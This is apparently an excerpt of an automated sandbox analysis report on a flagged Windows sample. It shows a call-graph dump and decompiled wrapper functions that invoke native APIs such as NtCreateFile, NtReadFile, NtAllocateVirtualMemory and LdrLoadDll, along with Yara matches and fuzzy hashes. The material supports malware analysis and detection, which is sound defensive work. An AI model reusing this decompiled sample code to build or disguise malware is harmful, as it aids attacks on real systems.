31695 41828c NtReadFile 31694->31695 31695->31665 31697 419a74 31696->31697 31698 419a5d 31696->31698 31697->31676 31698->31697 31699 419e50 2 API calls 31698->31699 31700 419a8b 31699->31700 31700->31676 31701->31666 31702->31653 31704 418dc0 LdrLoadDll 31703->31704 31705 4184ac RtlAllocateHeap 31704->31705 31705->31692 31707 419c2d 31706->31707 31829 4183a0 31706->31829 31707->31596 31710 413051 31709->31710 31712 413059 31709->31712 31710->31599 31711 41332c 31711->31599 31712->31711 31832 41ae30 31712->31832 31714 4130ad 31715 41ae30 2 API calls 31714->31715 31718 4130b8 31715->31718 31716 413106 31719 41ae30 2 API calls 31716->31719 31718->31716 31837 41aed0 31718->31837 31721 41311a 31719->31721 31720 41ae30 2 API calls 31723 41318d 31720->31723 31721->31720 31722 41ae30 2 API calls 31731 4131d5 31722->31731 31723->31722 31725 413304 31844 41ae90 LdrLoadDll RtlFreeHeap 31725->31844 31727 41330e 31845 41ae90 LdrLoadDll RtlFreeHeap 31727->31845 31729 413318 31846 41ae90 LdrLoadDll RtlFreeHeap 31729->31846 31843 41ae90 LdrLoadDll RtlFreeHeap 31731->31843 31732 413322 31847 41ae90 LdrLoadDll RtlFreeHeap 31732->31847 31735 414381 31734->31735 31736 413a30 8 API calls 31735->31736 31737 414397 31736->31737 31738 4143d2 31737->31738 31739 4143e5 31737->31739 31742 4143ea 31737->31742 31741 419c80 2 API calls 31738->31741 31740 419c80 2 API calls 31739->31740 31740->31742 31743 4143d7 31741->31743 31742->31604 31743->31604 31848 418a90 31744->31848 31747 418a90 LdrLoadDll 31748 418bed 31747->31748 31749 418a90 LdrLoadDll 31748->31749 31750 418bf6 31749->31750 31751 418a90 LdrLoadDll 31750->31751 31752 418bff 31751->31752 31753 418a90 LdrLoadDll 31752->31753 31754 418c08 31753->31754 31755 418a90 LdrLoadDll 31754->31755 31756 418c11 31755->31756 31757 418a90 LdrLoadDll 31756->31757 31758 418c1d 31757->31758 31759 418a90 LdrLoadDll 31758->31759 31760 418c26 31759->31760 31761 418a90 LdrLoadDll 31760->31761 31762 418c2f 31761->31762 31763 418a90 LdrLoadDll 31762->31763 31764 418c38 31763->31764 31765 418a90 LdrLoadDll 31764->31765 31766 418c41 31765->31766 31767 418a90 LdrLoadDll 31766->31767 31768 418c4a 31767->31768 31769 418a90 LdrLoadDll 31768->31769 31770 418c56 31769->31770 31771 418a90 LdrLoadDll 31770->31771 31772 418c5f 31771->31772 31773 418a90 LdrLoadDll 31772->31773 31774 418c68 31773->31774 31775 418a90 LdrLoadDll 31774->31775 31776 418c71 31775->31776 31777 418a90 LdrLoadDll 31776->31777 31778 418c7a 31777->31778 31779 418a90 LdrLoadDll 31778->31779 31780 418c83 31779->31780 31781 418a90 LdrLoadDll 31780->31781 31782 418c8f 31781->31782 31783 418a90 LdrLoadDll 31782->31783 31784 418c98 31783->31784 31785 418a90 LdrLoadDll 31784->31785 31786 418ca1 31785->31786 31787 418a90 LdrLoadDll 31786->31787 31788 418caa 31787->31788 31789 418a90 LdrLoadDll 31788->31789 31790 418cb3 31789->31790 31791 418a90 LdrLoadDll 31790->31791 31792 418cbc 31791->31792 31793 418a90 LdrLoadDll 31792->31793 31794 418cc8 31793->31794 31795 418a90 LdrLoadDll 31794->31795 31796 418cd1 31795->31796 31797 418a90 LdrLoadDll 31796->31797 31798 418cda 31797->31798 31799 418a90 LdrLoadDll 31798->31799 31800 418ce3 31799->31800 31801 418a90 LdrLoadDll 31800->31801 31802 418cec 31801->31802 31803 418a90 LdrLoadDll 31802->31803 31804 418cf5 31803->31804 31805 418a90 LdrLoadDll 31804->31805 31806 418d01 31805->31806 31807 418a90 LdrLoadDll 31806->31807 31808 418d0a 31807->31808 31809 418a90 LdrLoadDll 31808->31809 31810 418d13 31809->31810 31811 418a90 LdrLoadDll 31810->31811 31812 418d1c 31811->31812 31813 418a90 LdrLoadDll 31812->31813 31814 418d25 31813->31814 31815 418a90 LdrLoadDll 31814->31815 31816 418d2e 31815->31816 31817 418a90 LdrLoadDll 31816->31817 31818 418d3a 31817->31818 31819 418a90 LdrLoadDll 31818->31819 31820 418d43 31819->31820 31821 418a90 LdrLoadDll 31820->31821 31822 418d4c 31821->31822 31822->31607 31824 418dc0 LdrLoadDll 31823->31824 31825 417d3c 31824->31825 31854 9d9860 LdrInitializeThunk 31825->31854 31826 417d53 31826->31527 31828->31603 31830 4183bc NtAllocateVirtualMemory 31829->31830 31831 418dc0 LdrLoadDll 31829->31831 31830->31707 31831->31830 31833 41ae40 31832->31833 31834 41ae46 31832->31834 31833->31714 31835 419e50 2 API calls 31834->31835 31836 41ae6c 31835->31836 31836->31714 31838 41aef5 31837->31838 31839 41af2d 31837->31839 31840 419e50 2 API calls 31838->31840 31839->31718 31841 41af0a 31840->31841 31842 419c80 2 API calls 31841->31842 31842->31839 31843->31725 31844->31727 31845->31729 31846->31732 31847->31711 31849 418aab 31848->31849 31850 413e30 LdrLoadDll 31849->31850 31851 418acb 31850->31851 31852 413e30 LdrLoadDll 31851->31852 31853 418b77 31851->31853 31852->31853 31853->31747 31854->31826 31856 9d968f LdrInitializeThunk 31855->31856 31857 9d9681 31855->31857 31856->31613 31857->31613 31859 418dc0 LdrLoadDll 31858->31859 31860 4184ec RtlFreeHeap 31859->31860 31860->31617 31862 406e10 31861->31862 31863 406e0b 31861->31863 31864 419c00 2 API calls 31862->31864 31863->31535 31867 406e35 31864->31867 31865 406e98 31865->31535 31866 417d20 2 API calls 31866->31867 31867->31865 31867->31866 31868 406e9e 31867->31868 31872 419c00 2 API calls 31867->31872 31877 418420 31867->31877 31870 406ec4 31868->31870 31871 418420 2 API calls 31868->31871 31870->31535 31873 406eb5 31871->31873 31872->31867 31873->31535 31875 418420 2 API calls 31874->31875 31876 4070de 31875->31876 31876->31496 31878 418dc0 LdrLoadDll 31877->31878 31879 41843c 31878->31879 31882 9d96e0 LdrInitializeThunk 31879->31882 31880 418453 31880->31867 31882->31880 31884 419423 31883->31884 31887 409b20 31884->31887 31888 409b44 31887->31888 31889 409b80 LdrLoadDll 31888->31889 31890 408a5b 31888->31890 31889->31890 31890->31504 31892 409e93 31891->31892 31893 409f10 31892->31893 31906 417af0 LdrLoadDll 31892->31906 31893->31509 31896 418dc0 LdrLoadDll 31895->31896 31897 40cf8b 31896->31897 31897->31516 31898 418630 31897->31898 31899 41864f LookupPrivilegeValueW 31898->31899 31900 418dc0 LdrLoadDll 31898->31900 31899->31513 31900->31899 31902 418dc0 LdrLoadDll 31901->31902 31903 4180dc 31902->31903 31907 9d9910 LdrInitializeThunk 31903->31907 31904 4180fb 31904->31517 31906->31893 31907->31904 31909 40a017 31908->31909 31910 409e70 LdrLoadDll 31909->31910 31911 40a046 31910->31911 31911->31439 31913 40d07a 31912->31913 31921 40d130 31912->31921 31914 409e70 LdrLoadDll 31913->31914 31915 40d09c 31914->31915 31922 417da0 31915->31922 31917 40d0de 31925 417de0 31917->31925 31920 4182f0 2 API calls 31920->31921 31921->31442 31921->31443 31923 418dc0 LdrLoadDll 31922->31923 31924 417dbc 31923->31924 31924->31917 31926 417dfc 31925->31926 31927 418dc0 LdrLoadDll 31925->31927 31930 9d9fe0 LdrInitializeThunk 31926->31930 31927->31926 31928 40d124 31928->31920 31930->31928 31932 409c81 31931->31932 31933 409c7d 31931->31933 31934 409c9a 31932->31934 31935 409ccc 31932->31935 31933->31453 31977 417b30 LdrLoadDll 31934->31977 31978 417b30 LdrLoadDll 31935->31978 31937 409cdd 31937->31453 31939 409cbc 31939->31453 31941 40d1e0 3 API calls 31940->31941 31942 4133a6 31940->31942 31941->31942 31942->31455 31979 4076f0 31943->31979 31946 4076f0 19 API calls 31947 4079d9 31946->31947 31949 4079ed 31947->31949 31997 40d450 10 API calls 31947->31997 31949->31457 31951 418dc0 LdrLoadDll 31950->31951 31952 41837c 31951->31952 32116 9d98f0 LdrInitializeThunk 31952->32116 31953 40a752 31955 40d1e0 31953->31955 31956 40d1fd 31955->31956 32117 417e20 31956->32117 31959 40d245 31959->31461 31960 417e70 2 API calls 31961 40d26e 31960->31961 31961->31461 31963 417e8c 31962->31963 31964 418dc0 LdrLoadDll 31962->31964 32123 9d9780 LdrInitializeThunk 31963->32123 31964->31963 31965 40a7b5 31965->31467 31965->31470 31968 418dc0 LdrLoadDll 31967->31968 31969 417edc 31968->31969 32124 9d97a0 LdrInitializeThunk 31969->32124 31970 40a889 31970->31478 31973 418dc0 LdrLoadDll 31972->31973 31974 417c9c 31973->31974 32125 9d9a20 LdrInitializeThunk 31974->32125 31975 40a8dc 31975->31482 31977->31939 31978->31937 31980 406e00 4 API calls 31979->31980 31989 40770a 31980->31989 31981 407999 31981->31946 31981->31949 31982 40798f 31983 4070c0 2 API calls 31982->31983 31983->31981 31986 417d60 2 API calls 31986->31989 31988 4182f0 LdrLoadDll NtClose 31988->31989 31989->31981 31989->31982 31989->31986 31989->31988 31992 40a8f0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 31989->31992 31995 417c80 2 API calls 31989->31995 31998 417b70 31989->31998 32001 407520 31989->32001 32013 40d330 LdrLoadDll NtClose 31989->32013 32014 417bf0 LdrLoadDll 31989->32014 32015 417c20 LdrLoadDll 31989->32015 32016 417cb0 LdrLoadDll 31989->32016 32017 4072f0 31989->32017 32033 405e80 LdrLoadDll 31989->32033 31992->31989 31995->31989 31997->31949 31999 417b8c 31998->31999 32000 418dc0 LdrLoadDll 31998->32000 31999->31989 32000->31999 32002 407536 32001->32002 32034 4176e0 32002->32034 32004 40754f 32009 4076c1 32004->32009 32055 407100 32004->32055 32006 407635 32007 4072f0 11 API calls 32006->32007 32006->32009 32008 407663 32007->32008 32008->32009 32010 417d60 2 API calls 32008->32010 32009->31989 32011 407698 32010->32011 32011->32009 32012 418360 2 API calls 32011->32012 32012->32009 32013->31989 32014->31989 32015->31989 32016->31989 32018 407319 32017->32018 32095 407260 32018->32095 32021 40732c 32022 418360 2 API calls 32021->32022 32023 4073b7 32021->32023 32025 4073b2 32021->32025 32103 40d3b0 32021->32103 32022->32021 32023->31989 32024 4182f0 2 API calls 32026 4073ea 32024->32026 32025->32024 32026->32023 32027 417b70 LdrLoadDll 32026->32027 32028 40744f 32027->32028 32028->32023 32107 417bb0 32028->32107 32030 4074b3 32030->32023 32031 413a30 8 API calls 32030->32031 32032 407508 32031->32032 32032->31989 32033->31989 32035 419e50 2 API calls 32034->32035 32036 4176f7 32035->32036 32062 408140 32036->32062 32038 417712 32039 417750 32038->32039 32040 417739 32038->32040 32043 419c00 2 API calls 32039->32043 32041 419c80 2 API calls 32040->32041 32042 417746 32041->32042 32042->32004 32044 41778a 32043->32044 32045 419c00 2 API calls 32044->32045 32046 4177a3 32045->32046 32047 417a44 32046->32047 32068 419c40 32046->32068 32053 419c80 2 API calls 32047->32053 32050 417a30 32051 419c80 2 API calls 32050->32051 32052 417a3a 32051->32052 32052->32004 32054 417a99 32053->32054 32054->32004 32056 4071ff 32055->32056 32057 407115 32055->32057 32056->32006 32057->32056 32058 413a30 8 API calls 32057->32058 32060 407182 32058->32060 32059 4071a9 32059->32006 32060->32059 32061 419c80 2 API calls 32060->32061 32061->32059 32063 408165 32062->32063 32064 409b20 LdrLoadDll 32063->32064 32065 408198 32064->32065 32067 4081bd 32065->32067 32071 40b320 32065->32071 32067->32038 32069 417a29 32068->32069 32089 4183e0 32068->32089 32069->32047 32069->32050 32072 40b34c 32071->32072 32073 418040 LdrLoadDll 32072->32073 32074 40b365 32073->32074 32075 40b36c 32074->32075 32082 418080 32074->32082 32075->32067 32079 40b3a7 32080 4182f0 2 API calls 32079->32080 32081 40b3ca 32080->32081 32081->32067 32083 41809c 32082->32083 32084 418dc0 LdrLoadDll 32082->32084 32088 9d9710 LdrInitializeThunk 32083->32088 32084->32083 32085 40b38f 32085->32075 32087 418670 LdrLoadDll 32085->32087 32087->32079 32088->32085 32090 418dc0 LdrLoadDll 32089->32090 32091 4183fc 32090->32091 32094 9d9a00 LdrInitializeThunk 32091->32094 32092 418417 32092->32069 32094->32092 32096 407278 32095->32096 32097 409b20 LdrLoadDll 32096->32097 32098 407293 32097->32098 32099 413e30 LdrLoadDll 32098->32099 32100 4072a3 32099->32100 32101 4072ac PostThreadMessageW 32100->32101 32102 4072c0 32100->32102 32101->32102 32102->32021 32104 40d3c3 32103->32104 32110 417cf0 32104->32110 32108 417bcc 32107->32108 32109 418dc0 LdrLoadDll 32107->32109 32108->32030 32109->32108 32111 417d0c 32110->32111 32112 418dc0 LdrLoadDll 32110->32112 32115 9d9840 LdrInitializeThunk 32111->32115 32112->32111 32113 40d3ee 32113->32021 32115->32113 32116->31953 32118 417e3c 32117->32118 32119 418dc0 LdrLoadDll 32117->32119 32122 9d99a0 LdrInitializeThunk 32118->32122 32119->32118 32120 40d23e 32120->31959 32120->31960 32122->32120 32123->31965 32124->31970 32125->31975 32128 9d9540 LdrInitializeThunk

                                                                                                                Executed Functions

                                                                                                                Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 418270-4182b9 call 418dc0 NtReadFile
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                                                0x00418273
                                                                                                                0x0041827f
                                                                                                                0x00418287
                                                                                                                0x00418292
                                                                                                                0x004182ad
                                                                                                                0x004182b5
                                                                                                                0x004182b9

                                                                                                                APIs
                                                                                                                • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID: R=A$R=A
                                                                                                                • API String ID: 2738559852-3742021989
                                                                                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 252 409b20-409b49 call 41ab50 255 409b4b-409b4e 252->255 256 409b4f-409b5d call 41af70 252->256 259 409b6d-409b7e call 419300 256->259 260 409b5f-409b6a call 41b1f0 256->260 265 409b80-409b94 LdrLoadDll 259->265 266 409b97-409b9a 259->266 260->259 265->266
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                0x00409b3c
                                                                                                                0x00409b3f
                                                                                                                0x00409b44
                                                                                                                0x00409b49
                                                                                                                0x00409b53
                                                                                                                0x00409b58
                                                                                                                0x00409b5b
                                                                                                                0x00409b5d
                                                                                                                0x00409b65
                                                                                                                0x00409b6a
                                                                                                                0x00409b6a
                                                                                                                0x00409b71
                                                                                                                0x00409b79
                                                                                                                0x00409b7c
                                                                                                                0x00409b7e
                                                                                                                0x00409b92
                                                                                                                0x00000000
                                                                                                                0x00409b94
                                                                                                                0x00409b9a
                                                                                                                0x00409b4e
                                                                                                                0x00409b4e
                                                                                                                0x00409b4e

                                                                                                                APIs
                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2234796835-0
                                                                                                                • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                                                                • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 271 4181c0-418211 call 418dc0 NtCreateFile
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                0x004181cf
                                                                                                                0x004181d7
                                                                                                                0x0041820d
                                                                                                                0x00418211

                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004181BC, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 267 4181bc-4181d6 269 4181dc-418211 NtCreateFile 267->269 270 4181d7 call 418dc0 267->270 270->269
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E004181BC(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				0x5575c336();
				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                0x004181bc
                                                                                                                0x004181c3
                                                                                                                0x004181cf
                                                                                                                0x004181d7
                                                                                                                0x0041820d
                                                                                                                0x00418211

                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: b42beeebcb93c8c03a6cb9def736e9d972206908d1428750cdbc711cfac7c09e
                                                                                                                • Instruction ID: f0a779ebae8fee41b4deff0fa93ddf394fa56b85c640302032d43e9405f63f81
                                                                                                                • Opcode Fuzzy Hash: b42beeebcb93c8c03a6cb9def736e9d972206908d1428750cdbc711cfac7c09e
                                                                                                                • Instruction Fuzzy Hash: 75F0B6B2201108AFCB08CF88DC85EEB37ADAF8C754F158248FA0D97241D630E851CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041839B, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 274 41839b-4183dd call 418dc0 NtAllocateVirtualMemory
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0041839B(intOrPtr __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;
				void* _t23;

				 *0x8b55606b = __eax;
				_t11 = _a4;
				_t3 = _t11 + 0xc60; // 0xca0
				E00418DC0(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}





                                                                                                                0x0041839d
                                                                                                                0x004183a3
                                                                                                                0x004183af
                                                                                                                0x004183b7
                                                                                                                0x004183d9
                                                                                                                0x004183dd

                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: 0e4d5856592366917989f1aa1ff67522a7307a9f9b0a75a8d1dcbfef82523251
                                                                                                                • Instruction ID: 47126f67824ec2e12559f21743c4985258fd7cf86f1b65fdea1652602c17182f
                                                                                                                • Opcode Fuzzy Hash: 0e4d5856592366917989f1aa1ff67522a7307a9f9b0a75a8d1dcbfef82523251
                                                                                                                • Instruction Fuzzy Hash: 1BF01CB6200218AFDB14DF99DC80EE777ADEF98754F11855DFA1997241C630E911CBB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 277 4183a0-4183b6 278 4183bc-4183dd NtAllocateVirtualMemory 277->278 279 4183b7 call 418dc0 277->279 279->278
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                                0x004183af
                                                                                                                0x004183b7
                                                                                                                0x004183d9
                                                                                                                0x004183dd

                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 292 4182f0-418306 293 41830c-418319 NtClose 292->293 294 418307 call 418dc0 292->294 294->293
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004182F0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                                                0x004182f3
                                                                                                                0x004182f6
                                                                                                                0x004182ff
                                                                                                                0x00418307
                                                                                                                0x00418315
                                                                                                                0x00418319

                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

